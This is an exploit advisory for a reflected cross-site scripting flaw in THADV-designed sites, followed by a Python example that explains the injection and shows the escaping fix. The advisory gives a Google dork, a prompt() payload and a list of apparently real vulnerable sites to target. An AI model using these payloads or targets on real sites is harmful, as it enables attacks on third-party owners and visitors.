Design by THADV Cross Site Scripting

2016.01.25
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: Design by THADV Cross Site Scripting
|[+] Exploit Author: Ashiyane Digital Security Team
|[+] Vendor Homepage: http://thadv.com/
|[+] Google Dork: intext:"Design by THADV" inurl:mobile/index.php
|[+] Tested on: Win 10 / Mozilla Firefox
|[+] Date: 2016 23 January
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork, choose a target then add "%F6%22%20onmouseover=prompt%28992148%29%20//" after URL!
|[+] Now, by crossing mouse on a link in page you can see the alert.
|--------------------------------------------------------------|
|[+] Examples :
|[+] http://www.117.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.hwananfoods.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.chwm3d.com/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://oiltea.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://meishu.com.tw/wap/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.baotian.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.jhc888.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://chyu2.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.summerland.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.similar.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://hicar.imobi.tw/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.thadv.com/advmobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://www.udc.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+] http://yghoist.com/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
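The advisory's payload works because the request path is reflected into a link's href attribute without attribute-context encoding: the %22 closes the quoted href, onmouseover becomes a new attribute, and the trailing // neutralises the rest of the URL. The following is an added example, not code from the advisory or from THADV; the vulnerable template is an assumed reconstruction of the reflection point, and the %F6 byte is decoded as Latin-1 (an assumption about the server's charset). It shows the page's payload against the unsafe template, the same template with proper escaping, and a small parser-based check that a defender can reuse to confirm no event-handler attribute survives.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Payload from the advisory, decoded as the server would see it in the path.
# Assumption: %F6 is a single Latin-1 byte (a UTF-8 server would see U+FFFD instead).
ADVISORY_PAYLOAD = unquote("%F6%22%20onmouseover=prompt%28992148%29%20//", encoding="latin-1")


def render_link_vulnerable(path_info: str) -> str:
    """Assumed reconstruction of the flaw: the raw request path lands inside an href."""
    return f'<a href="/mobile/index.php/{path_info}">Home</a>'


def render_link_fixed(path_info: str) -> str:
    """Same template with attribute-context escaping; quote=True turns '"' into &quot;."""
    return f'<a href="/mobile/index.php/{escape(path_info, quote=True)}">Home</a>'


class _AnchorAttrs(HTMLParser):
    """Collects the attributes of the first <a> tag the browser-like parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "a" and not self.attrs:
            self.attrs = dict(attrs)


def anchor_attributes(fragment: str) -> dict:
    parser = _AnchorAttrs()
    parser.feed(fragment)
    return parser.attrs


def has_event_handler(fragment: str) -> bool:
    """True if any attribute on the anchor is an on* handler, i.e. the attribute was broken out of."""
    return any(name.startswith("on") for name in anchor_attributes(fragment))


if __name__ == "__main__":
    for render in (render_link_vulnerable, render_link_fixed):
        html = render(ADVISORY_PAYLOAD)
        print(render.__name__, "->", anchor_attributes(html), "handler:", has_event_handler(html))
```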


